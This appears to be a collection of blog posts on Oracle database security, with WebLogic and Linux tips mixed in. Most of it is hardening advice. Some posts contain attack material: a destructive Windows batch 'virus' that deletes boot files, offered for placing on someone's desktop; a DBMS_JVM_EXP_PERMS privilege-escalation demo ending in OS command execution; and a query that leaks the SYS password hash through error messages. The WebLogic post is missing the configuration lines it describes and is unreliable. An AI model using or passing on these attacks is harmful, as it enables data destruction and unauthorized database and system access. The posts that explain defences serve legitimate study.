Me, Security & Oracle

Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?
Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
Having Security awareness is first step to secure the system.

According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)
Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
As proof for this I will mention three different stories for the biggest top “black hat” hackers
The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)
Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and  jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.
Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter
The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.
As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.
Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.
You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.
The below example for simple virus, all you have to do is save as batch file and put it on someone desktop

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

 What if the victims was company or organization, the small effect could happened by hacker is put some employees out of works for short period of time. The large affect hacker could stole company secrets and lose them data, and make some damage, the last survey for Ponemon Research on behalf of juniper Networks 90% of companies had been breached at least once by hackers over the past 12 months.60% reported two or more breaches over the past year.

So companies or organizations should spend small fortune for security purpose software and hardware and lets us don’t forget to educate our employee.
The Security today consider as most important priority for the company for two reasons:
1-      Personal Data protections.
If you store data you should secure these data, since it’s related to customers or clients.
2-      Social Responsibility. 

Some of these data very important and contain people privacy which indicate us that company should protect these information by secure their systems.
When you leave your house for works purpose in the morning or hanging out with friends in the evening you make sure that your house is secure why? All this to keep unauthorized people to access, damage and theft By enable alarm system, make sure your doors is lock and even your windows, this is the same for the companies or organizations same principle but with different approach, the valuable things in the computers and networks is the data you create, this is the first reasons why we have computers and networks. 
Operating system can be reinstalled, Hardware can be replaced but we talking about data which is unique and sometimes it is irreplaceable.
Data is confidential and people privacy, this is the main reason why you don’t want lose it, you don’t want others to even view it without authorization , Visa information, mobile numbers, social numbers and account numbers.
If it’s left unprotected then information can be accessed by anyone, if these information fall into wrong hand, you’re live is nightmare, quite often ensure your data is protected is small price that you could pay to avoid future problems and prevent threats.
What if the data is not adequately protected, perhaps it compromised which called security breach, I am not talking here as individual level but as Business level that cause problems such as loss of reputation and lawsuits.
According to the Ponemon institute, cost of a Security breach during 2008 was $202 per record breached. Imagine if you have 1 Million records what is could cause to the company?
Intruders not care who you are or about your identity they just want to control your computer. By doing this they can hide their location and start attack.
By access to the system intruders discovers new vulnerabilities to exploit in computer software, don’t forget its networks which mean you can access to another computers on same network Complex right?
But what about the law, all the above information is just reports and security principle, check the below law that talks about security and data privacy.
Osama Mustafa

SOA_SERVER ( Managed Server ) Take too Long time to Start/Restart

On the weblogic console when trying to start managed Server it’s take too long time to start in my case it’s SOA_SERVER, almost 25 min only to start, which is not correct . to avoid this problem you need to follow the below steps simple but effective :-

Under Java Home ( That Used by Weblogic ) :-

cd /u01/app/fmw/jdk/jre/lib/security 

There’s file called Java.Security 

Edit this File using any Editor ( vi for example ).

Search for the following line :-


And Change it to :-


Or Another way add the below line to startup script in weblogic :-

Hope this will solve your problem.

Thank you
Osama Mustafa

Security Features 12c

As Any Newer Version of database oracle Enhance Security This time Oracle create new users for administration purpose

Separate user duties : 

SQL> select username from dba_users where username like ‘%SYS%’;

SYS  : Super user
SYSKM : Key magament tasks
SYSDG : Data Guard Managment
SYSBACKUP : backup management


The Privilege Analysis feature allows you to: 
  • Define a privilege capture
  • Start a privilege analysis during a period of time
  • Delete capture analysis
The Capture can be Done on Three level :
  • User
  • Role
  • Context
to understand this new package check the below examples :
sqlplus / as sysdba
SQL> create user test identified  by test ;
SQL> grant create session to test ;
Grant succeeded.
SQL> grant select any table to test ;
Grant succeeded.
Create new Capture using this package :

        name           =>  ‘test_capture’, –
        description    =>  ‘Capture_all_thing’, –
        type           =>   dbms_privilege_capture.g_database)


Name : Package name
Description : What this package fo
type : depend on level users ( g_database ) , role (g_role )  , Context : (g_role_and_context)

we need to enable this package to start capture :

 PL/SQL procedure successfully completed.

until everything goes fine now to start capture you have to logout from sqlplus and start do what you need to do.
SQL> conn test/test ;
SQL> select * from osama.test ;
no rows selected
SQL> select * from osama.test2 ;
———- ——————–
again reconnect as / as sysdba to disable capture then generate results like the following :
PL/SQL procedure successfully completed.
PL/SQL procedure successfully completed.

SQL> select username, object_owner, object_name, obj_priv
from   dba_used_objprivs
where  username in (‘OSAMA’, ‘TEST’) 

———- ———— —————————— ————————-
TEST   SYS ORA$BASE                                      USE
TEST   SYS DUAL                                              SELECT
TEST   SYS DUAL                                               SELECT
Drop Capture :
exec SYS.DBMS_PRIVILEGE_CAPTURE.DROP_CAPTURE (name => ‘test_capture’)
Thank you 
Osama mustafa

Oracle Security Topic, what you should be Afraid of ?

Again !!!!

SQL injection Occur when someone ( Hackers ) Writing Web application code that access to your database this code contain special format.

As DBA you need to understand who access to database and corporate with developers and make sure they are connect in secure way. and Use good SQL statement to avoid SQL injection, because of this Don’t relay on your firewall always make sure you secure your database and your code before start working on firewall, i am not saying here firewall will not protect your database yes it will but don’t forget now these days we have devices and complex network wireless, IPAD , Mobiles , Devices and Laptop are connected to your network, so in that case firewall will not protect you 100%, secure for better reasons 🙂

Users connect to database using Listener, Even database is down and listener is up user can still open connection to database ( which is caused the problem ) you can access to the server because there is no authentication way in listener, lot of examples on this type of attackes.

to solve this issue you need to Patch & patch OS and Database to ensure all security bugs and fixed.

there’s different type of oracle vulnerabilities Buffer overflow , listener issues , misunderstanding configuration and PL/SQL which indicate to SQL injection. most of our fears is not outside hackers/attacker it’s internally such as employee, hacking lessons online on internet and free everyone want to try it where mostly in work, in 2008 reports indicate that 26% of hacking issues happened because employee ignorant.

Company ignore security side because Resource such as money and consultant but they will not do that after they get hacked and lose everything data and customer information.

Most of the company has network administrator and system administrator so if you secure OS & network well your database will be secure.

Thank you
Osama Mustafa


Oracle Security –> Where to Start ? What to do ?

When you start reading the title you start thinking of Race, Mostly you can think of that since technology going fast, But my article it’s not about race it’s talking about where should i look when i secure my database what should i secure ? I post another articles talking about security and how to secure your database what is the benefits of securing database ? I will try to mention the most important points to secure and protecting database specially internal users.

Database is complex, so DBA ( Database administrator ) must understand potential security impacts  and The three components Triangle which i mentioned before in “Top ten Threats to Database” For example when DBA looking for availability they ignore right configuration which cause security vulnerability and this can lead to expose confidential data. it’s not about database if you have application you need to take over and start secure this application. but what can i do ? Where to start and how to start ? 

The Basic Steps to Start like i mentioned in my post “basic Steps to Secure Oracle”  is to discuss the risk management that lead to this, and you can secure your database by looking for the below keys  :

  • Auditing
  • Database Configuration
  • Access to database
  • Authentication 

I need to Remind you in something Secuirty Not means i will protect my database 100% it’s way to prevent attacks and make it harder, But what if the attackers get in database 


Auditing allow us to monitor database users,or anything that happened on database,first audit_sys_operations parameter should be set to TRUE to monitor sys user operation. The audit_trail parameter ( DB|OS) where the location of Audit files will goes ? For example Audit Files could be written on Database  or On File System if you set this parameter to OS. let’s talk about database here :

SQL> SELECT * FROM dba_obj_audit_opts;

SQL> SELECT * FROM dba_priv_audit_opts;
SQL> SELECT * FROM dba_stmt_audit_opts

 you cannot enable auditing to monitor all database activities but at least you can enable it for action such as create session , by fire this command —> audit create session;

What i love in 11gR2 documentation is that Oracle has create it’s own list for recommended auditing list which mean you should enable it. another type of auditing called FGA allow you to create policy to run on certain event for example when scott read from table emp column Sal i want to record this transaction on table. simple way read more about : —> DBMS_FGA.ADD_POLICY, and check this event to you need to have access on sys.fga$.

After you enable auditing it’s very important to Create your own reports to monitor database.Oracle gives you products to centralize this audit logs called audit vault the benefits of this products it’s automatically clean up the old data ( only if transferred to server ) and remove them.

 Database Configuration

When start talking about secure configuration lot of steps came to my mind, but i will try make simple since i can’t cover everything in this topics, i will divide it to more than one topics and Post on my blog, as you know in this part you have to look at network, Listener , Client side , Parameters , and Backup i am apology if i forget something, each part of this compentents are very important but let’s talk about parameters as we all know Database have something called spfile/pfile which is parameter file for database, Some of parameter set for TRUE by default while i don’t need them vice versa, change the value of this parameter are important to avoid any Weakness in the futures some of this parameters are :

  • OS_ROLES —-> Should be False 
  • os_authent_prefix —> Ops$ 
  • o7_dictionary_accessibility –> Should be False 
  • audit_sys_operations –> Should be True
  • Global_name —> Should be True
  • Remote_listener —> use it only if you need it
  • remote_login_passwordfile –> none 
  • sec_case_sensitive_logon –> Should be True
  • sql92_security —> Should be True 
  • remote_os_roles –> Should be False

lot of parameters, but i mention some of them.

Also Don’t forget to secure your Listener set password for listener, change default port simple steps but make you avoid future attack.
Another point don’t forget to patch your database check oracle site for you new CPU and PSU patch this will fix security vulnerability, Read More here.
 Another way also to secure configuration using Database firewall ( i will post topic about it later ) , network firewall and create policy inside the company.

Access to database

in each topic i post i am talking about this, i am will mention it in every topics in the future it’s important and the most of hacking cases happened because user has privileges more than he needs why ?  is your data not important !!! when the user authenticated to database first thing you need to check what this user allow to do ? especially for developers and application user ( dose he need DBA role to execute procedure ) 

 SQL> SELECT * FROM dba_sys_privs;
SQL> SELECT * FROM dba_role_privs;
SQL> SELECT * FROM dba_col_privs;
SQL> SELECT * FROM dba_tab_privs;

it’s not only about privileges , Create Development , test and QA database is important not everything works on Production is correct , create new users with different privileges some of them to monitor some of them to manege, Boring but Useful , Don’t forget Database links i mention before in my topics about database link security and how this could effect on your database, well Links create new privileges escalation, Review database link and check who access to them , who use them , how he use them and is it valid any more ?


as conclusion you have to check user privileges , Application users , Users , Database links and Create new instance for new jobs ,  not all company spend money to secure database but why should i buy new products while i am not doing the basic steps before that , it’s maybe avoid company small fortune and they will loves for that.


Well , I should mention it first but it’s all about security why should i care ? the first thing happened in database is authentications obtaining user information , Password the problem is The mutli way for doing that make risk is high you have OS authentications …. etc check my post about “Effect of Default Password” and you will be surprised what i can do with default password !!! in 11g you can check the Deafult password in new View :

SQL >  select * from dba_users_with_defpwd;

But you can’t also forget about

SQL > Select * from dba_users;

each of them has different job, not everything mentioned in dba_users_with_defpwd , Once you change password and Create new one ( hard to guess ) now you need to provide new rules for password here we start talking about profiles

SQL > Select * from dba_profiles ;

Example for how to create profile in oracle :


Also read Oracle documentation here.

I will take later about Authentications type In oracle provided with Examples and talk about which one is more secure and when i need to use it ?

Don’t forget that Oracle Provide Password complexity that located in $ORACLE_HOME/rdbms/admin with Script called –> utlpwdmg.sql just run it / as sysdba and new rules will be applied to passwords you can create your own one. but this script do the below

  • The password contains  eight characters or more.

  • Password not same as username.
  • password should not be simple 
  • password should contain Numeric and alphabetic.
  • password should be different from the last password.

and other’s features simple and amazing Right 🙂

as conclusion i will post more topics about security and more examples will be waiting, and i wish it’s useful and simple, i can’t cover all things in one article i will be huge i will try to do my best.

Thank you
Osama Mustafa

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield, Also you need to know this way of hacking it’s only works on Windows and Oracle database version infected 10gR2,11gR1  and 11gR2.

The below demonstration explain how to use it :


User created.


Grant succeeded.


no rows selected

SQL> CONNECT Test/test

  OPEN C1;

PL/SQL procedure successfully completed.



TYPE_NAME                      NAME                           ACTION
—————————— —————————— ———-         <>                  execute

As you see at first User Test Only has Create Session Privileges but after using the above package he now can execute any OS Command using Java Code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this :

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Thank you
Osama Mustafa

Hack Sys Password With Simple Way

Sometimes you want to know the SYS password with simplest way, well check the below if you have any User with DBA role then you can do that :

SQL>  select utl_inaddr.get_host_name((select username||’=’||password from dba_users where rownum=1)) from dual;

 select utl_inaddr.get_host_name((
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at “SYS.UTL_INADDR”, line 4
ORA-06512: at “SYS.UTL_INADDR”, line 35
ORA-06512: at line 1

Now You can use any Software or Online Site to Hack This Password

Thank you
Osama Mustafa

Basic Database Securiy GuideLines

Implementing any Database Security is not easy process which it’s Complex since the security has to be looked at OS Layer, Database, Network , application code, and backup lot of things you need to check if you need secure database you can’t ignore one part of this components.

You need to know even experts/Guru dose not have complete understanding for this list, maybe they have knowledge about it but not that much, But the most important things in securing database ( new one ) or securing application is early understanding security model very early in the development process  and how to develop it. you can read the this book  “Oracle security: Step-by-step” by Pete Finnigan he mentioned lot of basic steps to secure oracle database.

From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example if we asked ourself as DBA About SQL injection one of the TOP ten Threats in Database
it happens because somebody is writing a Web application that accesses your database which mean if this code writes incorrectly, what happened if the hacker get access to your database thru this code.because of this DBA needs to understand who is access to database  and make sure the developers are accessing in a secure way.

Internal/External hacker going to search for Holes in your application to get in,as we know there’s one of attack type used called Buffer Overflow because of this you need to keep you system is up to date patched like usual people most of them not doing that since they worried about if that patch will broke their system or application.

Today a lot of people are ignoring the security side of the job. Many companies don’t have the resources. Until you get hacked, and until you lose data, then you think you can get by with minimal security.

I mention before the in my article about Basic steps to secure Oracle Database some of this article provided with examples i will advise today to bookmark this to keep updated with Oracle Security patches lot of tips to talk about and need to share it here as soon as i can.

Thank you
Osama Mustafa

Reset/Hack Linux Root Password ( Unprocted GRUB )

Do you want to learn something New ? Hack/Reset Root Linux Password Then Continue Reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What If I Forget Root Password? Check The below

Restart The Server and you must see this screen Pause it click arrow :

Second Press “a” then add “1” like the below screen after finish Press enter :

Now Black Screen :

Print “Runlevel”

and Reset Root Password like the below by type “passwd” command :

Note : This Way works with Redhat , Fedora and CentOs i didn’t try it on Ubuntu

Thank you
Osama mustafa

Oracle Database vs Sql Server Security

Which one is the more secure ?

the above question asked before and will be asked today and in the future but what is the answer !! Before start asnwering this question you need to discuss somepoints.

as introduction Sql server is database solution product from Microsoft corporation with the following Version list :

  • SQL Server 2012
  • SQL Server 2008 R2
  • SQL Server 2008
  • SQL Server 2005
  • SQL Server 2000
  • SQL Server 7.0
 On the other hand we have oracle Database which RDMS ( Relation Database Managment System ) with the following version list :
  • Oracle7
  • Oracle8 Database
  • Oracle8i Database
  • Oracle9i Database
  • Oracle Database 10g
  • Oracle Database 11g
each of database include new features, this features could be related to high availability, database features and secuirty features, I try to be fair in my judgment, Let’s Back to Question Which is More Secure Oracle Database vs Microsoft Sql Server ? and why ?
I read lot of research regarding to this question and most of them caliming that sql server is more secure than Oracle database but why ?  oracle is the best database for large organization and can store more date with a great security when i mean great Security  there’s lot of solution products from Oracle such as Database vault , Audit Vault , and Data masking. But for small solutions and Orginization most of them use Sql server .
I red this Reports for David Litchfield here. and published in November 2006 and calims hat sql server is more secure than oracle database. also you need to know while you are compare this two database the main difference between them :
Microsoft Sql server is only working on One Platform ( Windows ), easy to manage, Most of the administration thru GUI (very friendly ) ,  simple to install  , Sql server is cost less than oracle ( Cost much more than less )  Licensing fees. all this indicate me to the following :
  • since sql server is easy to install and administration then the performance is usually fine.
  •  The only way to scale a system built on sql server technology is to add more memory and CPU to the single server hosting the database.
  • as mention before Sql server Suport Only One Platform.
On the other hand Oracle is Support all plaforms ( Linux , Unix , Windows , HP , AIX and Sun .. and sorry i forgot to mention others ), i will not say it’s easy to install but document are available for free if you follow them you will not be lost, Oracle database is enterprise solutions which mean if you need database that store huge data and support high availability cluster ( sql server dose not support it ) and introduce lot of backup recovery solution, data guard on of them becuase of this it’s expensive and costing the company don’t forget the main reason Oracle DBA salary is more than Sql server which mean the compaines will study this case before looking for solutions.
also to be fair Oracle support talking some time to answering you and solve the issue or database vulnerability , however in sql server support it’s amazing and solve the issue or vulnerability database in 24 hours or less.
since oracle database working for large organization business such as finical and insurance company the aim for any hackers ( i would like to mention here hacker not looking for small company to hack it’s need something will be worth if he getting caught ) it will make it under attack for any hacker in my articles i mentioned there’s no secure system 100% but you can make it harder for any hacker to access to your data and oracle provide with products to do that : Data Valut , Audit Vault , Database firewall and encryption.
Another point i would like to mention here ( take it also as point when you compare ) oracle working on more than Focusing on one  platform Security  will be the same as five/six/… platforms Security ? you should answer on this question not me !!!
 Oracle’s capacity to run on large databases, its have many performance improvement features,the performance can include Hardware or database ( sql server only hardware ) which is more secure ?
it’s completely up to you but don’t miss or ignore the point i mentioned before in this article
Thank you
Osama Mustafa